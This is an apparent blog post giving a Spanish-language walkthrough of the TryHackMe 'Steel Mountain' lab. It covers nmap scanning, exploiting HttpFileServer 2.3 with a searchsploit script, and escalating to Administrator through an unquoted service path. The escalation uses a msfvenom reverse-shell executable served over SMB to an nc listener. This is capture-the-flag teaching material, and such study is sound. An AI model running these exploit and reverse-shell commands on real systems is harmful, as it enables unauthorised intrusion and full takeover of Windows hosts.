

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/Website/favicon.png">
  <link rel="icon" href="/img/Website/favicon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="Walkthrough de Steel Mountain">
  <meta name="author" content="MelioD4rk">
  <meta name="keywords" content="">
  <meta name="description" content="Walkthrough de Steel Mountain">
<meta property="og:type" content="article">
<meta property="og:title" content="Steel Mountain">
<meta property="og:url" content="http://meliod4rk.github.io/2023/01/04/Steel-Mountain/index.html">
<meta property="og:site_name" content="H4CK1NGT1M3">
<meta property="og:description" content="Walkthrough de Steel Mountain">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://meliod4rk.github.io/img/Walkthrough/THM/SteelMountain/SteelMountain.jpeg">
<meta property="og:image" content="http://meliod4rk.github.io/img/Walkthrough/THM/SteelMountain/layout_p80.png">
<meta property="og:image" content="http://meliod4rk.github.io/img/Walkthrough/THM/SteelMountain/task_1.png">
<meta property="og:image" content="http://meliod4rk.github.io/img/Walkthrough/THM/SteelMountain/httpfileserver.png">
<meta property="og:image" content="http://meliod4rk.github.io/img/Walkthrough/THM/SteelMountain/searchsploit.png">
<meta property="og:image" content="http://meliod4rk.github.io/img/Walkthrough/THM/SteelMountain/rejetto.png">
<meta property="og:image" content="http://meliod4rk.github.io/img/Walkthrough/THM/SteelMountain/task_2.png">
<meta property="og:image" content="http://meliod4rk.github.io/img/Walkthrough/THM/SteelMountain/powerup.png">
<meta property="og:image" content="http://meliod4rk.github.io/img/Walkthrough/THM/SteelMountain/iobit.png">
<meta property="og:image" content="http://meliod4rk.github.io/img/Walkthrough/THM/SteelMountain/admin.png">
<meta property="og:image" content="http://meliod4rk.github.io/img/Walkthrough/THM/SteelMountain/task_3.png">
<meta property="og:image" content="http://meliod4rk.github.io/img/Walkthrough/THM/SteelMountain/task_4.png">
<meta property="article:published_time" content="2023-01-04T21:10:59.000Z">
<meta property="article:modified_time" content="2025-03-03T17:37:43.273Z">
<meta property="article:author" content="MelioD4rk">
<meta property="article:tag" content="Walkthrough">
<meta property="article:tag" content="THM">
<meta property="article:tag" content="Lab">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://meliod4rk.github.io/img/Walkthrough/THM/SteelMountain/SteelMountain.jpeg">
  
  <title>Steel Mountain - H4CK1NGT1M3</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"meliod4rk.github.io","root":"/","version":"1.8.12","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/Website/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname"}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>H4CK1NGT1M3</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categories
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/Walkthrough/THM/SteelMountain/SteelMountain.jpeg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="Steel Mountain">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2023-01-04 22:10" pubdate>
        January 4, 2023 pm
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      7.8k wc
    </span>
  

  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">Steel Mountain</h1>
            
            <div class="markdown-body">
              <h1 id="THM-Steel-Mountain-Walktrhough"><a href="#THM-Steel-Mountain-Walktrhough" class="headerlink" title="THM - Steel Mountain Walktrhough"></a>THM - Steel Mountain Walktrhough</h1><p><img src="/img/Walkthrough/THM/SteelMountain/SteelMountain.jpeg" srcset="/img/Website/loading.gif" lazyload alt="Steel Mountain"></p>
<h2 id="Task-1-Introduccion"><a href="#Task-1-Introduccion" class="headerlink" title="Task 1 - Introducción"></a>Task 1 - Introducción</h2><h3 id="1-Escanear-todos-los-puertos-TCP-abiertos-y-las-versiones"><a href="#1-Escanear-todos-los-puertos-TCP-abiertos-y-las-versiones" class="headerlink" title="1. Escanear todos los puertos TCP abiertos y las versiones:"></a>1. Escanear todos los puertos TCP abiertos y las versiones:</h3><p>La primera tarea de todas para realizar un ataque es detectar los puertos y servicios expuestos. Esta tarea se suele realizar con el comando:<br>Input:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">nmap -sC -sV -n -Pn -p- --open <span class="hljs-variable">$IP</span><br></code></pre></td></tr></table></figure>
<p>Output:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><code class="hljs bash">PORT      STATE SERVICE            VERSION<br>80/tcp    open  http               Microsoft IIS httpd 8.5<br>|_http-server-header: Microsoft-IIS/8.5<br>|_http-title: Site doesn<span class="hljs-string">&#x27;t have a title (text/html).</span><br><span class="hljs-string">| http-methods: </span><br><span class="hljs-string">|_  Potentially risky methods: TRACE</span><br><span class="hljs-string">135/tcp   open  msrpc              Microsoft Windows RPC</span><br><span class="hljs-string">139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn</span><br><span class="hljs-string">445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds</span><br><span class="hljs-string">3389/tcp  open  ssl/ms-wbt-server?</span><br><span class="hljs-string">| rdp-ntlm-info: </span><br><span class="hljs-string">|   Target_Name: STEELMOUNTAIN</span><br><span class="hljs-string">|   NetBIOS_Domain_Name: STEELMOUNTAIN</span><br><span class="hljs-string">|   NetBIOS_Computer_Name: STEELMOUNTAIN</span><br><span class="hljs-string">|   DNS_Domain_Name: steelmountain</span><br><span class="hljs-string">|   DNS_Computer_Name: steelmountain</span><br><span class="hljs-string">|   Product_Version: 6.3.9600</span><br><span class="hljs-string">|_  System_Time: 2023-01-04T21:31:32+00:00</span><br><span class="hljs-string">|_ssl-date: 2023-01-04T21:31:38+00:00; 0s from scanner time.</span><br><span class="hljs-string">| ssl-cert: Subject: commonName=steelmountain</span><br><span class="hljs-string">| Not valid before: 2023-01-03T21:09:47</span><br><span class="hljs-string">|_Not valid after:  2023-07-05T21:09:47</span><br><span class="hljs-string">5985/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)</span><br><span class="hljs-string">|_http-server-header: Microsoft-HTTPAPI/2.0</span><br><span class="hljs-string">|_http-title: Not Found</span><br><span class="hljs-string">8080/tcp  open  http               HttpFileServer httpd 2.3</span><br><span class="hljs-string">|_http-server-header: HFS 2.3</span><br><span class="hljs-string">|_http-title: HFS /</span><br><span class="hljs-string">47001/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)</span><br><span class="hljs-string">|_http-title: Not Found</span><br><span class="hljs-string">|_http-server-header: Microsoft-HTTPAPI/2.0</span><br><span class="hljs-string">49152/tcp open  msrpc              Microsoft Windows RPC</span><br><span class="hljs-string">49153/tcp open  msrpc              Microsoft Windows RPC</span><br><span class="hljs-string">49154/tcp open  msrpc              Microsoft Windows RPC</span><br><span class="hljs-string">49155/tcp open  msrpc              Microsoft Windows RPC</span><br><span class="hljs-string">49156/tcp open  msrpc              Microsoft Windows RPC</span><br><span class="hljs-string">49169/tcp open  msrpc              Microsoft Windows RPC</span><br><span class="hljs-string">49170/tcp open  msrpc              Microsoft Windows RPC</span><br><span class="hljs-string">Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows</span><br><span class="hljs-string"></span><br><span class="hljs-string">Host script results:</span><br><span class="hljs-string">| smb-security-mode: </span><br><span class="hljs-string">|   account_used: guest</span><br><span class="hljs-string">|   authentication_level: user</span><br><span class="hljs-string">|   challenge_response: supported</span><br><span class="hljs-string">|_  message_signing: disabled (dangerous, but default)</span><br><span class="hljs-string">| smb2-security-mode: </span><br><span class="hljs-string">|   3.0.2: </span><br><span class="hljs-string">|_    Message signing enabled but not required</span><br><span class="hljs-string">|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: 02:2f:e0:ae:7e:b5 (unknown)</span><br><span class="hljs-string">| smb2-time: </span><br><span class="hljs-string">|   date: 2023-01-04T21:31:32</span><br><span class="hljs-string">|_  start_date: 2023-01-04T21:09:38</span><br></code></pre></td></tr></table></figure>

<h3 id="2-Analizar-servicios-web"><a href="#2-Analizar-servicios-web" class="headerlink" title="2. Analizar servicios web"></a>2. Analizar servicios web</h3><p>Una vez hemos enumerado los puertos TCP abiertos, podemos ver que hay 2 servicios http corriendo. El primero en el puerto 80 (Microsoft IIS httpd 8.5) y el segundo en el puerto 8080 (HttpFileServer httpd 2.3). Los otros servicios http no contienen información.</p>
<h3 id="3-Puerto-80"><a href="#3-Puerto-80" class="headerlink" title="3. Puerto 80"></a>3. Puerto 80</h3><p><img src="/img/Walkthrough/THM/SteelMountain/layout_p80.png" srcset="/img/Website/loading.gif" lazyload alt="Figura 1: Web puerto 80"></p>
<p>Si inspeccionamos la web, podemos ver que la imagen que muestra pertenece a la ruta <strong>/img/BillHarper.png</strong>. De aquí podemos deducir que el nombre del empleado del mes es *<strong>Bill Harper</strong>. Salvo esa información, la web no tiene nada más interesante.</p>
<p>Otro método para obtener el nombre sería hacer una busqueda inversa de dicha imagen con plataformas como <a target="_blank" rel="noopener" href="https://tineye.com/">https://tineye.com/</a></p>
<h3 id="4-Solucion"><a href="#4-Solucion" class="headerlink" title="4. Solución"></a>4. Solución</h3><p><img src="/img/Walkthrough/THM/SteelMountain/task_1.png" srcset="/img/Website/loading.gif" lazyload alt="Figura 2: Solución Task 1"></p>
<h2 id="Task-2-Acceso-inicial"><a href="#Task-2-Acceso-inicial" class="headerlink" title="Task 2 - Acceso inicial"></a>Task 2 - Acceso inicial</h2><h3 id="1-Puerto-8080"><a href="#1-Puerto-8080" class="headerlink" title="1. Puerto 8080"></a>1. Puerto 8080</h3><p><img src="/img/Walkthrough/THM/SteelMountain/httpfileserver.png" srcset="/img/Website/loading.gif" lazyload alt="Figura 3: Web puerto 8080"><br>La web muestra que utiliza la version de http <strong>HttpFileServer 2.3</strong></p>
<p>Si buscamos dicha version con la herramienta searchsploit, veremos que nos aparecen diferentes exploits disponibles.</p>
<p>Input:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">searchsploit http file server 2.3<br></code></pre></td></tr></table></figure>
<p>Output:<br><img src="/img/Walkthrough/THM/SteelMountain/searchsploit.png" srcset="/img/Website/loading.gif" lazyload alt="Figura 4: Exploits disponibles para HttpFileServer 2.3"><br>Nosotros utilizaremos el primero de todos en este caso. Lo descargaremos y lo editaremos cambiandole las correspondientes IPs y puertos.</p>
<p>Input:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash">1) searchsploit -m windows/remote/49584.py<br>2) mv 49584.py rejetto.py<br>3) vim rejetto.py (cambiar IPs y puertos. Este exploit ya te levanta el propio listenner automaticamente)<br>4) python rejetto.py<br></code></pre></td></tr></table></figure>
<p>Output:<br>Obtendremos una consola de Powershell con el usuario <strong>bill</strong>.<br><img src="/img/Walkthrough/THM/SteelMountain/rejetto.png" srcset="/img/Website/loading.gif" lazyload alt="Figura 5: Explotación de HttpFileServer 2.3 con Rejetto"></p>
<p>Para obtener la flag de user, deberemos dirigirnos hacia el escritorio de bill y leer el fichero user.txt</p>
<p>Input:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">1) <span class="hljs-built_in">cd</span> C:\Users\bill\Desktop    <br>2) <span class="hljs-built_in">type</span> user.txt<br></code></pre></td></tr></table></figure>

<p>Output:</p>
<figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs asciidoc">b04763<span class="hljs-strong">*****</span><span class="hljs-strong">*****</span><span class="hljs-strong">*****</span><span class="hljs-strong">*****</span><span class="hljs-strong">***</span> USER FLAG<br></code></pre></td></tr></table></figure>

<h3 id="2-Solucion"><a href="#2-Solucion" class="headerlink" title="2. Solución"></a>2. Solución</h3><p><img src="/img/Walkthrough/THM/SteelMountain/task_2.png" srcset="/img/Website/loading.gif" lazyload alt="Figura 6: Solución Task 2"></p>
<h2 id="Task-3-Escalada-de-privilegios"><a href="#Task-3-Escalada-de-privilegios" class="headerlink" title="Task 3 - Escalada de privilegios"></a>Task 3 - Escalada de privilegios</h2><h3 id="1-Analizar-vectores-de-PE-con-PowerUp-ps1"><a href="#1-Analizar-vectores-de-PE-con-PowerUp-ps1" class="headerlink" title="1. Analizar vectores de PE con PowerUp.ps1"></a>1. Analizar vectores de PE con PowerUp.ps1</h3><p><strong>PowerUp.ps1</strong> es una librería de Powershell que hace checks automáticos de vectores de escalada de privilegios local de la máquina víctima. El código lo podremos descargar desde el <a target="_blank" rel="noopener" href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1">Github</a> de su autor.</p>
<p>Como tenemos escritura en el escritorio de Bill, copiaremos el PowerUp.ps1 desde nuestro equipo local a el equipo victima (steelmountain). Para ello levantaremos un servidor SMB desde nuestra kali. En mi caso, utilizo la librería de <a target="_blank" rel="noopener" href="https://github.com/fortra/impacket">Impacket</a> que contiene diferentes herramientas que nos serán de utilidad en el futuro.</p>
<table>
<thead>
<tr>
<th><strong>Parametro</strong></th>
<th><strong>Función</strong></th>
</tr>
</thead>
<tbody><tr>
<td><strong>impacket-smbserver</strong></td>
<td>Levanta un servidor SMB en el puerto 445 por defecto</td>
</tr>
<tr>
<td><strong>kalifolder</strong></td>
<td>Nombre que le asignamos a la carpeta para acceder de forma remota</td>
</tr>
<tr>
<td><strong>~/Documents/thm/steelmountain/privesc</strong></td>
<td>Directorio que compartimos por SMB desde nuestra Kali</td>
</tr>
</tbody></table>
<p>Input Kali:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">1) wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1 -O ~/Documents/thm/steelmountain/privesc/PowerUp.ps1<br>2) impacket-smbserver kalifolder ~/Documents/thm/steelmountain/privesc<br></code></pre></td></tr></table></figure>

<p>Input SteelMountain\bill:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash">1) <span class="hljs-built_in">cd</span> C:\Users\bill\Desktop <br>2) copy \\<span class="hljs-variable">$IP</span>\kalifolder\PowerUp.ps1 .<br>3) Import-Module .\PowerUp.ps1<br>4) Invoke-AllChecks<br></code></pre></td></tr></table></figure>

<p>Output SteelMountain\bill:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs bash">ServiceName    : AdvancedSystemCareService9<br>Path           : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe<br>ModifiablePath : @&#123;ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory&#125;<br>StartName      : LocalSystem<br>AbuseFunction  : Write-ServiceBinary -Name <span class="hljs-string">&#x27;AdvancedSystemCareService9&#x27;</span> -Path &lt;HijackPath&gt;<br>CanRestart     : True<br>Name           : AdvancedSystemCareService9<br>Check          : Unquoted Service Paths<br></code></pre></td></tr></table></figure>
<p><img src="/img/Walkthrough/THM/SteelMountain/powerup.png" srcset="/img/Website/loading.gif" lazyload alt="Figura 7: PowerUp.ps1 output"></p>
<h3 id="2-¿Que-es-Unquoted-Service-Paths"><a href="#2-¿Que-es-Unquoted-Service-Paths" class="headerlink" title="2. ¿Qué es Unquoted Service Paths?"></a>2. ¿Qué es Unquoted Service Paths?</h3><p>La vulnerabilidad <strong>Unquoted Service Paths</strong> indica que la ejecución del servicio esta mal definida la ruta, por lo que los espacios tienen dicha importancia para explotar la vulnerabilidad.</p>
<p>Para el Path: <strong>C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe</strong> existen las diferentes rutas que probará hasta encontrar el ejecutable (define el .exe al final de cada comprobación):</p>
<ol>
<li>C:\Program.exe</li>
<li>C:\Program Files.exe</li>
<li>C:\Program Files (x86)\IObit\Advanced.exe</li>
<li>C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe</li>
</ol>
<h3 id="3-Explotacion-de-PE"><a href="#3-Explotacion-de-PE" class="headerlink" title="3. Explotación de PE"></a>3. Explotación de PE</h3><p>Para aprovecharnos de dicha vulnerabilidad, con el comando <strong>icacls</strong> comprobaremos los permisos de los diferentes directorios para comprobar donde tenemos permisos de escritura como Bill. Por esa razón, deberemos comprobar primero permisos a nivel de directorio y luego si existe dicho ejecutable en la ruta.</p>
<p><strong>Muy importante!!:</strong> Verificar que el campo <strong>CanRestart</strong> está en <strong>True</strong>, dado que es lo que nos va a permitir reiniciar el servició una vez lo hayamos sustituido (hijackeado).</p>
<h4 id="1-C"><a href="#1-C" class="headerlink" title="1. C:\"></a>1. C:\</h4><p>Debemos comprobar si C:\ tenemos permisos de escritura</p>
<p>Input:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">icacls <span class="hljs-string">&quot;C:\&quot; </span><br></code></pre></td></tr></table></figure>

<p>Output:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs bash">NT AUTHORITY\SYSTEM:(OI)(CI)(F)<br>BUILTIN\Administrators:(OI)(CI)(F)<br>BUILTIN\Users:(OI)(CI)(RX)<br>BUILTIN\Users:(CI)(AD)<br>BUILTIN\Users:(CI)(IO)(WD)<br>CREATOR OWNER:(OI)(CI)(IO)(F)<br></code></pre></td></tr></table></figure>

<h4 id="2-C-Program-Files-x86-IObit"><a href="#2-C-Program-Files-x86-IObit" class="headerlink" title="2. C:\Program Files (x86)\IObit\"></a>2. C:\Program Files (x86)\IObit\</h4><p>Input:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">icacls <span class="hljs-string">&quot;C:\Program Files (x86)\IObit\&quot;</span><br></code></pre></td></tr></table></figure>

<p>Output C:\Program:<br><img src="/img/Walkthrough/THM/SteelMountain/iobit.png" srcset="/img/Website/loading.gif" lazyload alt="Figura 8: Permisos &quot;C:\Program Files (x86)\IObit\&quot;"></p>
<p>Podemos ver que en la ruta “C:\Program Files (x86)\IObit&quot; tenemos permisos de escritura como Bill, lo cual podemos aprovechar para agregar un ejecutable malicioso a dicha ruta con el nombre de Advanced.exe. Como se ha explicado en el caso 3 previamente.</p>
<p><strong>3) C:\Program Files (x86)\IObit\Advanced.exe</strong></p>
<h4 id="2-1-Creacion-y-subida-de-libreria-maliciosa"><a href="#2-1-Creacion-y-subida-de-libreria-maliciosa" class="headerlink" title="2.1 Creación y subida de librería maliciosa"></a>2.1 Creación y subida de librería maliciosa</h4><p>Una vez hemos detectado el directorio vulnerable, deberemos subirnos un fichero llamado Advanced.exe que será el encargado de establecernos una reverse shell hacia nuestro equipo.<br>Para ello nos crearemos una reverse shell con msfvenom y la compartiremos via SMB con el equipo victima.</p>
<p>Input Kali:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash">1) <span class="hljs-built_in">cd</span> ~/Documents/thm/steelmountain/privesc<br>2) msfvenom -p windows/shell_reverse_tcp LHOST=<span class="hljs-variable">$IP</span> LPORT=443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe<br>3) nc -lvnp 443<br>3) impacket-smbserver kalifolder ~/Documents/thm/steelmountain/privesc<br></code></pre></td></tr></table></figure>

<p>Input SteelMountain\bill:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">1) Stop-Service -Name AdvancedSystemCareService9<br>2) copy \\<span class="hljs-variable">$IP</span>\kalifolder\Advanced.exe <span class="hljs-string">&quot;C:\Program Files (x86)\IObit&quot;</span><br>3) Start-Service -Name AdvancedSystemCareService9<br></code></pre></td></tr></table></figure>

<p>En el listenner de nuestra kali veremos que se nos ha establecido una conexión como Administrator.<br><img src="/img/Walkthrough/THM/SteelMountain/admin.png" srcset="/img/Website/loading.gif" lazyload alt="Figura 9: Obtención de usuario Administrador&quot;"></p>
<p>Para obtener la flag de root, deberemos dirigirnos hacia el escritorio de Administrator y leer el fichero root.txt</p>
<p>Input:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">1) <span class="hljs-built_in">cd</span> C:\Users\Administrator\Desktop    <br>2) <span class="hljs-built_in">type</span> root.txt<br></code></pre></td></tr></table></figure>

<p>Output:</p>
<figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs asciidoc">9af5f3<span class="hljs-strong">*****</span><span class="hljs-strong">*****</span><span class="hljs-strong">*****</span><span class="hljs-strong">*****</span><span class="hljs-strong">***</span> ROOT FLAG<br></code></pre></td></tr></table></figure>

<h3 id="4-Solucion-1"><a href="#4-Solucion-1" class="headerlink" title="4. Solución"></a>4. Solución</h3><p><img src="/img/Walkthrough/THM/SteelMountain/task_3.png" srcset="/img/Website/loading.gif" lazyload alt="Figura 10: Solución Task 3"></p>
<h2 id="Task-4-Acceso-y-escalada-de-privilegios-con-Metasploit"><a href="#Task-4-Acceso-y-escalada-de-privilegios-con-Metasploit" class="headerlink" title="Task 4 - Acceso y escalada de privilegios con Metasploit"></a>Task 4 - Acceso y escalada de privilegios con Metasploit</h2><p>Debido a que en el examen del OSCP “no esta permitido” el uso de Metasploit, hemos realizado la explotación de forma manual con un exploit en Python de searchsploit.</p>
<h3 id="1-Solucion"><a href="#1-Solucion" class="headerlink" title="1. Solución"></a>1. Solución</h3><p><img src="/img/Walkthrough/THM/SteelMountain/task_4.png" srcset="/img/Website/loading.gif" lazyload alt="Figura 11: Solución Task 4"></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/Walkthroughs/">Walkthroughs</a>
                    
                      <a class="hover-with-bg" href="/categories/Walkthroughs/THM/">THM</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/Walkthrough/">Walkthrough</a>
                    
                      <a class="hover-with-bg" href="/tags/THM/">THM</a>
                    
                      <a class="hover-with-bg" href="/tags/Lab/">Lab</a>
                    
                  </div>
                
              </div>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/03/03/Light/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Light</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/03/31/Pandora/">
                        <span class="hidden-mobile">Pandora</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
